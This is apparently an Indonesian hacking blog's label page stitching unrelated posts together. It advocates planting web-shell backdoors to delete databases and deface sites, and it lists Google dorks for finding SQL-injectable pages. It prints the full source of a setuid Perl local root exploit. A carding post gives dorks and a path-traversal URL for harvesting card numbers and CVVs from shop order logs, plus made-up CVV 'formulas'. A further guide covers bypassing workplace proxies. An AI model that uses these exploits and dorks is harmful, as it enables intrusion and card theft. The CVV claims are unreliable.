Apa itu shell ? shell adalah program (penterjemah perintah) yang menjembatani user dengan sistem operasi dalam hal ini kernel (inti sistem operasi), umumnya shell menyediakan prompt sebagai user interface, tempat dimana user mengetikkan perintah-perintah yang diinginkan baik berupa perintah internal shell (internal command), ataupun perintah eksekusi suatu file progam (eksternal command), selain itu shell memungkinkan user menyusun sekumpulan perintah pada sebuah atau beberapa file untuk dieksekusi sebagai program.
Macam - macam shell
Tidak seperti sistem operasi lain yang hanya menyediakan satu atau 2 shell, sistem operasi dari keluarga unix misalnya linux sampai saat ini dilengkapi oleh banyak shell dengan kumpulan perintah yang sangat banyak, sehingga memungkinkan pemakai memilih shell mana yang paling baik untuk membantu menyelesaikan pekerjaannya, atau dapat pula berpindah-pindah dari shell yang satu ke shell yang lain dengan mudah, beberapa shell yang ada di linux antara lain:
Bourne shell(sh),
C shell(csh),
Korn shell(ksh),
Bourne again shell(bash),
dsb.
Masing - masing shell mempunyai kelebihan dan kekurangan yang mungkin lebih didasarkan pada kebutuhan pemakai yang makin hari makin meningkat, untuk dokumentasi ini shell yang digunakan adalah bash shell dari GNU, yang merupakan pengembangan dari Bourne shell dan mengambil beberapa feature (keistimewaan) dari C shell serta Korn shell, Bash shell merupakan shell yang cukup banyak digunakan pemakai linux karena kemudahan serta banyaknya fasilitas perintah yang disediakan.versi bash shell yang saya gunakan adalah 2.04
[admin@linux$]echo $BASH_VERSION
bash 2.04.12(1)-release
Mungkin saat anda membaca dokumentasi ini versi terbaru dari bash sudah dirilis dengan penambahan feature yang lain.
nah kalo menurut pengetuan ane shell itu biasanya ditanam dalam suatu website yang tujuannya untuk mempunyai hak akses admin tanpa harus login terlebih dahulu. Istilah lainnya kita masuk via pintu belakang A.K.A backdoor
Shell yang sudah di tanam berguna untuk menajalan kan aksi kita ( ya kalo dah masuk mah terserah moe di apain ). Delete database, Hajar page index, jumping2,dll.
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Keamanan komputer adalah suatu cabang teknologi yang dikenal dengan nama keamanan informasi yang diterapkan pada komputer. Sasaran keamanan komputer antara lain adalah sebagai perlindungan informasi terhadap pencurian atau korupsi, atau pemeliharaan ketersediaan, seperti dijabarkan dalam kebijakan keamanan.
Menurut Garfinkel dan Spafford, ahli dalam computer security, komputer dikatakan aman jika bisa diandalkan dan perangkat lunaknya bekerja sesuai dengan yang diharapkan. Keamanan komputer memiliki 5 tujuan, yaitu:
Availability
Confidentiality
Data Integrity
Control
Audit
Keamanan komputer memberikan persyaratan terhadap komputer yang berbeda dari kebanyakan persyaratan sistem karena sering kali berbentuk pembatasan terhadap apa yang tidak boleh dilakukan komputer. Ini membuat keamanan komputer menjadi lebih menantang karena sudah cukup sulit untuk membuat program komputer melakukan segala apa yang sudah dirancang untuk dilakukan dengan benar. Persyaratan negatif juga sukar untuk dipenuhi dan membutuhkan pengujian mendalam untuk verifikasinya, yang tidak praktis bagi kebanyakan program komputer. Keamanan komputer memberikan strategi teknis untuk mengubah persyaratan negatif menjadi aturan positif yang dapat ditegakkan.
Pendekatan yang umum dilakukan untuk meningkatkan keamanan komputer antara lain adalah dengan membatasi akses fisik terhadap komputer, menerapkan mekanisme pada perangkat keras dan sistem operasi untuk keamanan komputer, serta membuat strategi pemrograman untuk menghasilkan program komputer yang dapat diandalkan
Sumber: wiki
Kita bahas dulu 5 poin:
- Availability: Kemampuan ketersediaannya informasi yang dibutuhkan, kebanyakan jika komputer tidak aman, maka tingkat availabilitynya bisa dipertanyakan. Komputer dapat di shutdown jika dapat di exploit oleh attacker.
- Confidentiality: Kerahasiaan informasi yang ada dalam komputer, hal ini bertujuan agar seluruh informasi yang rahasia dalam komputer tidak jatuh ke tangan attacker. Berbagai cara dilakukan untuk hal ini misalkan pembatasan akses, penggunaan secure mode, cyrptography, dsb.
- Data Integrity: Data memberikan informasi yang sama, utuh dan konsisten. Data integrity ini dilakukan agar tidak terjadi penyisipan-penyisipan informasi dari attacker dalam komputer. Biasanya hal ini berkaitan dengan verifikasi dan validitas informasi tersebut.
- Control: Informasi yang ada dalam komputer dapat kita control, kita awasi dan kita jaga. Hal ini bertujuan untuk kita dapat memonitoring seluruh aktifitas yang ada dalam komputer.
- Audit: Fungsi audit sangat penting, terutama untuk mengetahui log, informasi ini juga bisa digunakan untuk melakukan pengecekan kelemahan-kelemahan komputer, mengetahui & mencari titik lemah komputer serta melakukan improvement.
Technorati : hacking, internet, keamanan komputer
Del.icio.us : hacking, internet, keamanan komputer
Zooomr : hacking, internet, keamanan komputer
Flickr : hacking, internet, keamanan komputer
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
Technorati : hacking, internet, website
Del.icio.us : hacking, internet, website
Zooomr : hacking, internet, website
Flickr : hacking, internet, website
entuk dari exploit itu adalah seperti ini
/*
* Copyright Kevin Finisterre
*
* ** DISCLAIMER ** I am in no way responsible for your stupidity.
* ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
*
* ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
* ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
* ** WARNING ** have a boot disk ready incase some thing goes wrong.
*
* Setuid Perl exploit by KF - kf_lists[at]secnetops[dot]com - 1/30/05
*
* this exploits a vulnerability in the PERLIO_DEBUG functionality
* tested against sperl5.8.4 on Debian
*
* kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
* kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
* ls: /etc/ld.so.preload: No such file or directory
* kfinisterre@jdam:~$ ./ex_perl
* sperl needs fd script
* You should not call sperl directly; do you need to change a #! line
* from sperl to perl?
* kfinisterre@jdam:~$ su -
* jdam:~# id
* uid=0(root) gid=0(root) groups=0(root)
* jdam:~# rm /etc/ld.so.preload
*
*/
Lho ID nya dah root?? xD.. Untuk kernel yang lainnya juga tidak jauh berbeda
Hehehe… Monggo silakan di cari local root exploit yang lain ya
#define PRELOAD "/etc/ld.so.preload"
#include <stdio.h>
#include <strings.h>
int main(int *argc, char **argv)
{
FILE *getuid;
if(!(getuid = fopen("/tmp/getuid.c","w+"))) {
printf("error opening file\n");
exit(1);
}
fprintf(getuid, "int getuid(){return 0;}\n" );
fclose(getuid);
system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so
/tmp/getuid.c -lc");
putenv("PERLIO_DEBUG="PRELOAD);
umask(001); // I'm rw-rw-rw james bitch!
system("/usr/bin/sperl5.8.4″);
FILE *ld_so_preload;
char preload[] = {
"/tmp/getuid.so\n"
};
if(!(ld_so_preload = fopen(PRELOAD,"w+"))) {
printf("error opening file\n");
exit(1);
}
fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
fclose(ld_so_preload);
}
dikutip dari http://www.k-otik.com/exploits/20050207.ex_perl.c.php
untuk menyelesaikanya ada dengan cara :
1. boot pake knoppix atau linux rescue
2. trus cari file dengan nama file /etc/ld.so.preload
3. dalam file tersebut isinnya /tmp/getuid.so
4. kalo ada file tersebut hapus ajah jagn ragu2
5. setelah itu boot lage dari harddisk, ngga perlu diinstall ulang
jadi cara kerja dari exploit itu adalah ketika kita booting dia akan mencara file /tmp/getuid.so yang padahal sebenarnya emang ngga ada …. jadi hati hati dengan exploit ini… kalo emang ngga mao dibuat bingung ….
Technorati : exploit, hacking
Del.icio.us : exploit, hacking
Zooomr : exploit, hacking
Flickr : exploit, hacking
CREDIT CARDS SECRETS
Pada bagian ini anda akan mengetahui rahasia tersembunyi tentang Kartu Kredit,meliputi :
Kode Rahasia CVV (Cardholder Verification Value)
Kode Rahasia CVV (Cardholder Verivication Value)
Setiap Kartu Kredit dilengkapi dengan 3 atau 4 KODE ANGKA RAHASIA, yang sering dikenal sebagai CVV (Cardholder Verification Value). CVV memiliki banyak sebutan lainnya, misalnya :
CSC (Card Security Code) atau CVN (Card Verification Number).
• Perusahaan Visa menyebutnya sebagai CVV2,
• Mastercard menyebutnya sebagai CVC2,
• Diners Club menyebutnya sebagai CVV2,
• Perusahaan American Express menyebutnya CIN (Card Identification
Number).
Visa dan Mastercard Memiliki 3 digit CVV/CVC, sedangkan American Express Memiliki 4 digit CIN. Biasanya CVV ini terletak di bagian belakang kartu kredit, yang merupakan nomor otorisasi manual untuk kartu kredit supaya bisa melakukan transaksi. Jika anda biasa belanja di Hypermarket / Supermarket dengan menggunakan Kartu Kredit, coba perhatikan, biasanya seorang Kasir yang teliti, setelah menggesek Kartu Kredit Anda, dia akan membalik Kartu Kredit Anda untuk mengecek 3 DIGIT CVV Anda yang muncul di layar komputernya. Tapi biasanya jika Kartu Kredit Anda memiliki foto, seorang kasir tidak perlu melihatCVV Anda, tapi dia hanya perlu mencocokkan foto anda di kartu dengan diri anda, jadi jangan heran apalagi Ge-Er apabila seorang kasir yang cantik melirik anda ..... hehehe .... CVV jauh lebih sering digunakan untuk TRANSAKSI yang tidak menggunakan Kartu Kredit secara fisik, tapi Lebih Sering digunakan untuk mengecek pembelanjaan secara Online / Via Internet. Jadi Dengan Adanya CVV ini , maka sang pemilik Kartu Kredit akan merasa amandalam mencegah orang yang tidak diinginkan melakukan transaksi denganmenggunakan Nomor Kartu Kredit miliknya. BENARKAH ? 00 % SALAH !!!!
Anda akan mengetahui bagaimana cara mengetahui Nomer Kode Rahasia CVV dari kartu kredit manapun juga ... !!! Syaratnya hanya 1, anda harus mengetahui NOMER KARTU KREDITnya , Tidak Bisa Ditawar- Tawar ... !!! Silahkan dibaca terus...
Mengetahui apakah suatu Kartu Kredit Valid atau Tidak
. Cara Rahasia Mengetahui apakah suatu Kartu Kredit Valid atau Tidak. Setiap anda berbelanja menggunakan Kartu Kredit, maka ada suatu proses keabsahan suatu Kartu Kredit yang dikenal dengan nama Authentifikasi, yaitu suatu proses pengecekan apakah kartu kredit yang anda gunakan masih Valid Atau Tidak. Biasanya pengecekan akan lebih mudah dengan menggunakan mesin atau sistem, tapi tahukah anda bahwa anda bisa juga melakukan pengecekan apakah Kartu Kredit yang anda miliki Valid atau tidak ? Lalu bagaimanakah cara pengecekannya ? Mari kita simak bersama :
Contoh :
Misalnya No. Kartu Kreditnya adalah 5378-5432-1011-8224 Saya Ingin mengetahui apakah nomor Kartu Kredit itu Valid atau Tidak ? Begini caranya :
Terdapat 16 DIGIT pada Nomer Kartu Kredit Tersebut.
Langkah I,
Kalikan SEMUA ANGKA pada DIGIT GANJIL dengan "2", lalu :
- Jika hasilnya Lebih dari 9 maka KURANGI HASILNYA dengan "9",
- Jika hasilnya Kurang dari 9, biarkan saja.
Setelah itu JUMLAHKAN SEMUANYA.
Digit 1 : 5 ; 5x2 = 10 {Lebih dari 9}, jadi 10 - 9 = 1
Digit 3 : 7 ; 7x2 = 14 {Lebih dari 9}, jadi 14 - 9 = 5
Digit 5 : 5 ; 5x2 = 10 {Lebih dari 9}, jadi 10 - 9 = 1
Digit 7 : 3 ; 3x2 = 6 {Biarkan saja, karena KURANG DARI 9}
Digit 9 : 1 ; 1x2 = 2 {Biarkan saja, karena KURANG DARI 9}
Digit 11 : 1 ; 1x2 = 2 {Biarkan saja, karena KURANG DARI 9}
Digit 13 : 8 ; 8x2 = 16 {Lebih dari 9}, jadi 16 - 9 = 7}
Digit 15 : 2 ; 2x2 = 4 {Biarkan saja, karena KURANG DARI 9}
Lalu jumlahkan :
1 + 5 + 1 + 6 + 2 + 2 + 7 + 4 = 28
Langkah II,
Jumlahkan Digit yang ada di posisi Genap pada data No. Kartu Kredit 5378-5432-1011-8224
Digit 2 : 3
Digit 4 : 8
Digit 6 : 4
Digit 8 : 2
Digit 10 : 0
Digit 12 : 1
Digit 14 : 2
Digit 16 : 4
--------------- +
Jumlah : 24
Langkah III,
Jumlahkan hasil Langkah I dengan Langkah II
28 + 24 = 52
Karena 52 TIDAK HABIS DIBAGI dengan "10" (Masih menyisakan bilangan
desimal yaitu 5,2) , maka KARTU KREDIT ITU TIDAK VALID / TIDAK SAH / TIDAK DAPAT DIGUNAKAN.
Mudah, bukan ?
Cara Mengetahui Nomer Kode Rahasia CVV / CVN / CIN dari Kartu Kredit apapun
Nah ini dia yang ditunggu - tunggu, saya akan memberitahu anda cara mengetahui
Nomer Kode Rahasia CVV / CVN /CIN dari Nomer Kartu Kredit jenis Apapun. Mengetahui Nomer Kode Rahasia CVV / CVN / CIN dari KartuKredit apapun Misal saya ambil contoh no. Kartu Kredit :
5378-5432-1011-8224
KETERANGAN :
Perlu Anda ketahui bahwa saya hanya mengetikkan 16 digit angka yang asal-asalan saja. Saya tidak mengetahui nama pemilik Kartu Kredit Ini, Tinggalnya dimana, berasal dari Indonesia / Luar Negeri, dan sebagainya. Sekali Lagi, saya hanya asala-salan saja memberi contoh No. Kartu Kredit, karena ini hanyalah sebuah contoh saja.
Kembali ke CONTOH No. Kartu Kredit tersebut :
5378-5432-1011-8224
Cara mengetahui No. CVVnya adalah sebagai berikut :
"RUMUS 1"
Cari Digit ke 8 : yaitu 2
Cari Digit ke 12 : yaitu 0
Cari Digit ke 3 : yaitu 7 (TAMBAHKAN DENGAN "1") , berarti 7 + 1 = 8
Maka ketahuan CVVnya adalah 208 , hehehe ... mudah, bukan ?
Atau bisa juga dengan rumus yang kedua :
"RUMUS 2"
Cari Digit ke 7 : yaitu 3
Cari Digit ke 13 : yaitu 8
Cari Digit ke 3 : yaitu 7 (TAMBAHKAN DENGAN "1") , berarti 7 + 1 = 8
Maka ketahuan CVVnya adalah 388 , hehehe ... mudah, bukan ?
Atau bisa juga dengan rumus yang ketiga :
"RUMUS 3"
Cari Digit ke 9 : yaitu 1
Cari Digit ke 3 : yaitu 7
Cari Digit ke 6 : yaitu 4 (TAMBAHKAN DENGAN "1") , berarti 4 + 1 = 5
Maka ketahuan CVVnya adalah 175 , hehehe ... mudah, bukan ?
Silahkan anda coba sendiri menggunakan KARTU KREDIT ANDA, kebetulan setelah saya iseng-iseng mencoba RUMUS 1, 2 dan 3 dengan menggunakan NOMER KARTU KREDIT yang saya miliki, ternyata CVV Kartu Kredit yang saya miliki
cocok tuh perhitungannya menggunakan Rumus yang ke 3 !!!
Tapi anda jangan kuatir, konon rumus ini ketepatannya hanya 95 % saja, jadi masih
ada kemungkinan 5 % yang meleset.
Jadi apabila anda mencobanya dengan Kartu Kredit Anda, dan setelah anda
menghitung dan HASILNYA SALAH, maka Beruntunglah Anda !!!
Saya malah jadi was-was dan deg-degan , karena CVV KARTU KREDIT saya
TERNYATA DAPAT DITEBAK dengan menggunakan Rumus No. 3 !!!
Wah, saya jadi harus lebih berhati-hati nich apabila ingin Berbelanja Online, bisa-bisa
Kartu Kredit Saya nanti dijebol maling.... Wah, mudah-mudahan hal itu jangan
sampai terjadi deh ... Amin.
Cara Rahasia Mengetahui apakah suatu Kartu Kredit diterbitkan oleh Visa/ Mastercard/ Amex/ Discover
Untuk Tambahan Pengetahuan Anda, maka berikut saya jelaskan mengenai nomer sandi dari masing-masing perusahaan Kartu Kredit.
UNTUK MASTERCARD :
Angka Awal pada Kartu Kredit adalah 51, 52, 53, 54, 55, 56, dll dengan panjang Nomer Kartu Kredit Antara 14 hingga 16 Digit.
UNTUK VISA :
Angka Awal pada Kartu Kredit adalah "4" dengan panjang Nomer Kartu Kredit adalah 13 hingga 16 Digit.
UNTUK AMERICAN EXPRESS :
Angka Awal pada Kartu Kredit adalah "34" dengan panjang Nomer Kartu Kredit adalah 15 Digit.
UNTUK DINERS CLUB :
Angka Awal pada Kartu Kredit adalah 300,301,302,303,304,305, dan 38 dengan panjang Nomer Kartu Kredit adalah 14 Digit
UNTUK JCB :
Angka Awal pada Kartu Kredit adalah "3" dengan panjang Nomer Kartu Kredit adalah 16 Digit
UNTUK BANKCARD :
Angka Awal pada Kartu Kredit adalah "56" dengan panjang Nomer Kartu Kredit adalah 14 Atau 16 Digit
UNTUK DISCOVER CARD :
Angka Awal pada Kartu Kredit adalah 6011, 6500 - 6509, 6013 dengan panjang Nomer Kartu Kredit adalah 16 Digit.
Mencari data kartu kredit yg telah digunakan utk berbelanja di Internet dgn menggunakan Google
Nah ini dia salah satu DATA YANG BERSIFAT SANGAT RAHASIA dan HANYA segelintir saja orang yang tahu ... Beruntunglah anda membeli Produk Ini ... Sebelumnya, saya memohon dengan segala kerendahan hati, gunakanlah hal ini sebagai pengetahuan saja, jangan digunakan untuk berbuat kejahatan ... Ingatlah bahwa Hukum Karma itu ada, Tuhan sudah menetapkan Hukum Sebab Akibat di dunia ini... Siapa menabur Angin, dia akan menabur badai. Siapa menanam Padi, dia akan memanen Padi, tidak mungkin hasil panennya Jagung... Saya menuliskan hal ini, HANYA MEMPUNYAI 1 TUJUAN, yaitu : BETAPA TIDAK AMANNYA BERTRANSAKSI DI INTERNET menggunakan KARTU KREDIT !!! Karena itulah, berhati-hatilah anda jika ingin menggunakan Kartu Kredit Anda utnuk berbelanja secara Online. Baik, saya tidak ingin berpanjang Lebar Lagi..
Inilah cara mencari data kartu kredit dengan menggunakan bantuan mesin Google ...
1. Browse : www.google.com
2. Untuk mengetahui No. CVV Kartu Kredit, ketik : inurl:cvv2.txt , maka jreng... jreng.... keluarlah banyak data no. CVV
3. Anda juga bisa mengetik : http://www.situstujuan.com/images/cvv2txt , ganti tulisan "situstarget" dengan nama situs Toko Online yang bertebaran didunia Internet
4. Anda juga bisa mengetik : inurl:order.log
5. Selain itu cobalah : http://www.situstujuan.com/cgibin/store/index.cgi?page=../admin/files/order.log , anda akan menemukan data alamat, no.kartu kredit, serta No. CVV kartu kredit tersebut,
Technorati : carding, cvv, internet, website
Del.icio.us : carding, cvv, internet, website
Zooomr : carding, cvv, internet, website
Flickr : carding, cvv, internet, website
Dalam aktifitas di dunia maya ( internet) sangat erat hubungannya dengan akses ke suatu service ataupun suatu server. Misalnya saat kita melakukan browsing ke suatu situs, Chatting, check email, akses cpanel dan aktifitas - aktifitas lain yang di lakukan di internet. Ada kalanya kita tidak bisa mengakses salah satu service - service tersebut diatas. Misalnya saat kita berada di lingkungkan sekolah, kampus atau perkantoran yang kebanyakan memblocking akses ke IRC, blocking akses ke situs - situs tertentu ( misal ke http://friendster.com dll ), tidak bisa mengakses cpanel dari web dan lain sebagainya. Lantas bagaimana cara nya supaya kita bisa mengakses internet dengan nyaman, tanpa terbatasi oleh pemblockingan akses yang dilakukan oleh sekolah , kampus ataupun kantor ?. Di dalam artikel ini akan di bahas mengenai by pass proxy atau yang biasa dikenal dengan istilah tunneling. Tunneling disini artinya membuat jalur ke proxy luar ( artinya menggunakan proxy luar ) sehinga kita bisa melakukan surfing internet
tanpa adanya blocking.
Dalam Artikel kali ini saya akan menjelaskan beberapa hal mengenai by pass proxy menggunakan software your-freedom yang bisa di download melalui http://your-freedom.net. Adapun garis besar dalam artikel ini adalah sebagai berikut :
By Pass Proxy with Your Freedom (http://your-freedom.net).
1. Penjelasan singkat tentang software your freedom
a. Apa itu software your‐freedom ?
b. Apakah fungsi dari software your‐freedom ?
c. Mengapa memakai software your‐freedom ?
2. Installasi dan penggunaan software your‐freedom
a. Bagaimana cara menginstall software your‐freedom ?
b. Software apa saja yang di butuhkan ?
c. Bagaimana cara penggunaaan software your‐freedom ?
i. Untuk browsing (Mozzila FireFox)
ii. Try Before You Buy (TBYB)
iii Your-Freedom Live server statistics
1. Penjelasan singkat mengenai software your‐freedom.
a. Apa itu software your‐freedom ?
Software your freedom merupakan suatu software yang bisa secara gratis di dapatkan di situs resmi your‐freedom (http://your‐freedom.net) yang digunakan untuk by pass rule proxy yang ada di jaringan local kita (saat kita menggunakan proxy untuk koneksi internet) sehingga kita bisa leluasa menggunakan akses internet kita sesuai keinginan kita tanpa terhalang oleh rule / blocking dari proxy local kita. Prinsip kerja dari softare your‐freedom tersebut adalah dengan metode tunneling , artinya user yang menggunakan software tersebut tunneling (membuat jalan ) ke proxy server yang telah disediakan olehsoftware your‐freedom sehingga bisa by pass proxy lokal yang ada dijaringan lokal kita.
b. Apakah fungsi dari software your‐freedom ?
Seperti yang telah digambarkan diatas bahwa software ini digunakan untuk tunneling ke server proxy yang telah di sediakan oleh your‐freedom. Tunneling disini maksudnya membuat jalan ke server yang telah di sediakan sehingga kita akan lolos atau bebas dari rule yang ada di proxy lokal kita. Misalnya saat kita berada di sekolah, kampus ataupun kantor biasanya situssitus tertentu di blok (contoh situs http://friendster.com), maka kita bisa mengakali nya dengan memakai software ini sehingga kita bisa membuka situs http://friendster.com. Contoh lain software ini juga bisa digunakan untuk melakukan port forwarding sehingga kita bisa chatting dengan IRC menggunakan proxy yang telah disediakan oleh software ini. Dengan kata lain, kita memakai proxy luar yang di sediakan oleh your‐freedom untuk tetap bisa melakukan akses internet dengan nyaman tanpa adanya halangan ataupun blocking baik terhadap situs‐ situs maupun blocking terhadap akses port tertentu ke internet (missal port 6667 untuk iRC, 21 untuk ftp dsb).
c. Mengapa memakai software your‐freedom ?
Mungkin kita bertanya - tanya mengapa kita memakai software ini ? apa untungnya?
Baiklah saya akan menjelaskan beberapa point penting mengenai manfaat memakai software ini. Adapun manfaat kita menggunakan software ini adalah :
Lebih praktis karena software ini akan mencari server (proxy server ) secara otomatis yang telah disediakan oleh your‐freedom, sehi ngga kita tinggal memilih (tinggal klik saja) Bersifat open source sehingga kita bisa mendapatkan nya secara gratis di situs http://your‐freedom.net
‐Dukungan terhadap server yang banyak sehingga kita bisa
lebih leluasa memilihnya serta service yang disediakan bermacam - macam.
‐Fasilitas socks 4 5 dan web proxy yang bisa digunakan untuk berbagai keperluan sesuai keinginan kita.
2. Installasi dan penggunaan software your‐freedom
a. Bagaimana cara menginstall software your‐freedom ?
Download filennya dari http://www.your-freedom.net/ems-dist/,(cari yang ukurannya ~ 11 MB, dan tanggal release paling baru) install seperti biasa,gunakan OpenVPN sebagai tools pendukung dari your‐freedom download darihttp://openvpn.net/download.html
c. Bagaimana cara penggunaaan software your‐freedom ?
| Jalankan program your‐freedom melalui Start All Programs Your Freedom |
| Klik configure , kemudian click "Use Wizard" |
| Setelah muncul Welcome selanjutnya kita klik "Next" Silahkan isi proxy address yang kita gunakan di jaringan lokal kita untuk koneksi ke internet (saat ini saya memakai proxy lokal 172.16.1.1:8080). Apabila anda tidak menggunakan proxy lokal untuk koneksi internet, artinya direct connection ke internet maka biarkan kosong saja (tidak perlu diisi proxy address dan port nya) iv.Setelah muncul All Fine, artinya pengecekan proxy telah berhasil (tidak perlu ada konfigurasi proxy selanjutnya.). So tinggal klik next. v.Silahkan pilih protocol yang ingin anda coba. Check list semua aja. Kemudian klik "Next" |
| Tunggu beberapa saat hingga software ini mencari lokasi your freedom server yang terdekat dengan kita. Please standby ☺ . Setelah itu akan di temukan beberapa server. |
| Silahkan pilih server yang ingin anda gunakan, kemudian klik "Next". (saat ini saya memilih server ems15.your‐freedom.de ) |
| Silahkan masukkan username dan password your‐freedom anda kemudian klik "Next". Untuk mendapatkan freedom account silahkan register di http://www.your-freedom.net/index.php?id=114 |
| Selamat anda telah berhasil mengkonfigurasi your freedom . Untuk save konfigurasi anda, klik "Save and Exit" |
| Klik "Start Connection" untuk memulai melakukan koneksi ke Freedom server |
Selamat anda telah berhasil terkoneksi dengan freedom server yang anda setting tadi. (saya memilih freedom server : ems15.your‐freedom.de:443). Dari situ terlihat bahwa kita mendapatkan External IP address yaitu : 193.37.152.232 yang server nya terletak di DE, Germany
======================================================================
i. Untuk browsing (Mozzila FireFox)
Setelah your freedom connect dengan server langkah selanjuannya adalah meng-setting browser. Saya menggunkan browser MozzilaFirefox, rubah proxy pada browser, carannya : klik Tools -- Options.. --Pilih Advanced -- lalu pilih tab Network -- klik tombol Setting, lalu masukan proxy defaul dari your freedom, yakni 127.0.0.1 port 8080, centang Use This proxy to all protocol..kemudian OK
ii. Try Before You Buy
Try Before You Buy merupkan fasilitas diberikan oleh your-freedom, dimana kita Dapat account upgrade untuk jangka waktu pemakaian 4 jam dan ini hanya berlaku untuk 1 account. Dengan mendaftarkan account/login, kita dihttp://www.your-freedom.net/index.php?id=154 maka kita boleh mencoba 3 paket yang diberikan oleh your-freedom (basic=256Kbp/s, Enhanced=4 Mbit/s, dan Total=Unlimited) selama 4 jam..Pilih saja paket Total, dan Anda akan segera tes drive dalam waktu satu menit. (Perlu diketahui bahwa Anda harus menutup dan kembali memulai Your Freedom client Anda untuk melihat perubahanya).Hal ini sangat berguna, karena paket Free (yang biasa digunaka) your-freedom hanya di batasi speed 56Kbp/s. Triknya, kita tinggal daftar aja pake banyak account.
[b]iii./[b] Your-Freedom Live server statistics
Server : ems01.your-freedom.de
Country: US (United States)
Groups: default,volume,northamerica,interactive,voip,openvpn
Server : ems02.your-freedom.de
Country: DE (German)
Groups: default,volume,europe,p2p,interactive,openvpn
Server : ems03.your-freedom.de
Country: FR (Prancis)
Groups: default,volume,europe,p2p,voip,openvpn
Server : ems04.your-freedom.de
Country: FR (Prancis)
Groups: default,volume,europe,p2p,voip,openvpn
Server : ems05.your-freedom.de
Country: FR (Prancis)
Groups: default,volume,europe,p2p,interactive,openvpn
Server : ems06.your-freedom.de
Country: DE (German)
Groups: default,volume,europe,p2p,openvpn,voip
Server : ems06.your-freedom.de
Country: DE (German)
Groups: default,volume,europe,p2p,openvpn
Technorati : akal, bobol koneksi, hacking, ilmu, proxy, yourfreedom
Del.icio.us : akal, bobol koneksi, hacking, ilmu, proxy, yourfreedom
Zooomr : akal, bobol koneksi, hacking, ilmu, proxy, yourfreedom
Flickr : akal, bobol koneksi, hacking, ilmu, proxy, yourfreedom
erminologi peretas muncul pada awal tahun 1960-an di antara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata bahasa Inggris "hacker" pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik daripada yang telah dirancang bersama.
